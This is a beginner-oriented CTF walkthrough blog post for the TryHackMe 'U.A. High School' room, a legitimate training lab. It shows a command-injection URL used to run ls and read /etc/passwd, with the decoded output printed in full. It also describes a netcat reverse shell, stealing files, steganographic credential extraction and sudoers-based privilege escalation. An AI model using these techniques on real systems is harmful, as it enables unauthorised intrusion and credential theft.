U.A. High School TryHackMe Walkthrough | Writeup | Beginner Friendly | THM | — SuNnY

Theme Pic of TryHackMe Room : U.A. High School

INTRODUCTION

The “U.A. High School” room on TryHackMe is inspired by the popular anime “My Hero Academia” . The room typically involves a combination of challenges related to cybersecurity, themed around the fictional U.A. High School, where students train to become heroes.
It includes tasks like network scanning, exploiting vulnerabilities, or finding hidden flags within a network simulation that fits the anime’s theme.

The room is likely designed to be engaging for fans of the series, offering a mix of technical cybersecurity skills while also referencing elements from the show and none-the-less for aspiring ethical hackers and red teamers

ROOM OBJECTIVES -

Finding the User and Root Flags
( Recon>Enum>Gaining Foothold > user.txt || Privilege Escalation > root.txt )

DIFFICULTY

Easy Room [ Linux Based Operating System ]
In my personal opinion , this room should be ranked to Medium
Due to image deciphering and base64 encryption
Just a Personal Heads up

** ( This Writeup | Walkthrough is Beginner Friendly ) **

KUDOS TO THE CREATORS

Special Thanks to the Creators of this room

LET’S START THE PARTY !

Firing up the Machine →

Let’s begin with adding the ip address to the Hosts file
and give it a domain name — school.thm

 echo "IP-ADDRESS-OF-YOUR-MACHINE school.thm" | sudo tee -a /etc/hosts

Other Way :

nano /etc/hosts

IP-ADDRESS     school.thm
( Control + X and Y for saving the file ) 
Dont forget to add your machine’s ip address instead of — 
“IP-ADDRESS-OF-YOUR-MACHINE”

Let’s Start { Refer to Cyber Kill Chain }

Reconnaissance

nmap scan to Find Ports

Found 2 Open Ports : Port 80 ( HTTP ) & Port 22 ( SSH )

Directory Enumeration Using GoBuster

gobuster dir -w /home/kali/Seclist/raft-medium-words.txt -u http://school.thm -s 200,301 -b "" 

with the flag -s , we are filtering the return status codes to 200 and 301 for faster scan results — you may skip this one and continue with the normal scan rates

GoBuster Directory Enumeration Screenshot

We Found a Directory → /assets

We find that the directory is not valid and returning a 404

Let’s Enumerate the Sub-Directory → /assets

PHP ? Possible Command Injection ?

PHP detected which may lead us to index.php

PS — I Love cats 🤫

AARGH Sorry Sorry … wrong MEME ! yikes 🤣🤣

PHP > Command Injection ? Now the Right one -

http://school.thm/assets/index.php?cmd=ls [ Command Injection ]

We found a Base64 on the main index php page using ls command

From the Base64 We found → images , index.php and styles.css

wow now it’s confirmed that we have a index.php while using index.php , Great ! DeJaVu activated !!

Command Injection Check ✅

Let’s Try with the cat passwd .. yeah cat !

Found Base64 again .. Let’s repeat the same

Base64 found →

cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMDoxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMToxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC10aW1lc3luYzp4OjEwMjoxMDQ6c3lzdGVtZCBUaW1lIFN5bmNocm9uaXphdGlvbiwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDY6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXNsb2c6eDoxMDQ6MTEwOjovaG9tZS9zeXNsb2c6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwNTo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnRzczp4OjEwNjoxMTE6VFBNIHNvZnR3YXJlIHN0YWNrLCwsOi92YXIvbGliL3RwbTovYmluL2ZhbHNlCnV1aWRkOng6MTA3OjExMjo6L3J1bi91dWlkZDovdXNyL3NiaW4vbm9sb2dpbgp0Y3BkdW1wOng6MTA4OjExMzo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCmxhbmRzY2FwZTp4OjEwOToxMTU6Oi92YXIvbGliL2xhbmRzY2FwZTovdXNyL3NiaW4vbm9sb2dpbgpwb2xsaW5hdGU6eDoxMTA6MTo6L3Zhci9jYWNoZS9wb2xsaW5hdGU6L2Jpbi9mYWxzZQpmd3VwZC1yZWZyZXNoOng6MTExOjExNjpmd3VwZC1yZWZyZXNoIHVzZXIsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnVzYm11eDp4OjExMjo0Njp1c2JtdXggZGFlbW9uLCwsOi92YXIvbGliL3VzYm11eDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTEzOjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC1jb3JlZHVtcDp4Ojk5OTo5OTk6c3lzdGVtZCBDb3JlIER1bXBlcjovOi91c3Ivc2Jpbi9ub2xvZ2luCmRla3U6eDoxMDAwOjEwMDA6ZGVrdTovaG9tZS9kZWt1Oi9iaW4vYmFzaAoKbHhkOng6OTk4OjEwMDo6L3Zhci9zbmFwL2x4ZC9jb21tb24vbHhkOi9iaW4vZmFsc2UK

echo "base64-above" | base64 -d

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
deku:x:1000:1000:deku:/home/deku:/bin/bash    <<------

Deku 1000:1000 → Well Hello There ! We know our user now

Now Let’s get to the User

Using Command injection Lets get a reverse connection using Netcat

Let’s Setup our Netcat first @ 1337 port

We leet !

Getting a Reverse Shell using PHP exec

Don’t Forget to URL encode URL : revshells.com

Got the Reverse Shell !!

Voila ! We Got the www-data connection via the PHP exec code

We Found 2 Files , Let’s Transfer these files from the Victim’s machine to the attacker’s system using Netcat .

Got the File oneforall.jpg to the attacker Machine and upon further inspection found that the file uses the extension .jpg but is in data format

Which means the data is corrupted or the jpg file format is set incorrectly
This has to be the latter , so lets first try to check the format of this file and compare the same with the jpg file format and fix the discrepancy

Part Where we are going to Change the incorrect jpg file headers

Opening the file using Hexedit
If Hexedit is not installed on your Linux (Kali/Parrot) -

apt install hexedit -y

hexedit oneforall.jpg

We need to change intial headers of the file

changing all the values is required

After changing the header of the file we get this →

The format for the correct Raw JPG can be found easily

Now using this file we can use stegnography to check file contents

Using steghide to extract the files inside the file

We need a passphrase to extract the contents

After doing a lot of exploring , a HIDDEN_CONTENT was discovered using command → ls -la
pwd = /var/www/Hidden_Content

We find the passphrase for the jpg file →

Another Base64 , now you know what to do

Let’s try using this passphrase with the jpg file we just fixed

we got the creds.txt

We have now got the creds for Deku , our user !!

Let’s try to login using the creds we extracted from a jpg file →

ssh deku@school.thm 

Enter the password : 

We found our User Flag

Privilege Escalation

First things first

sudo -l

sudo -l ( lowercase L )

Let’s try to check the contents of feedback.sh

By changing the pwd and launching the feedback.sh with sudo

We have added user deku to sudoers files

Let’s check again by using sudo -l

Voila ! we have set NOPASSWD to ALL

lets grant sudo access to our /bin/bash to escalate privileges

We have pwned U.A. High School room

Hope you liked this TryHackMe Walkthrough ,

Let’s Connect on Linkedin → https://linkedin.com/in/sunnysinghverma

if you did you can add a clap to this article to let me know .
You can also follow me on medium to get more articles about CTFs and Cybersecurity in the near Future

Thank you !
SuNnY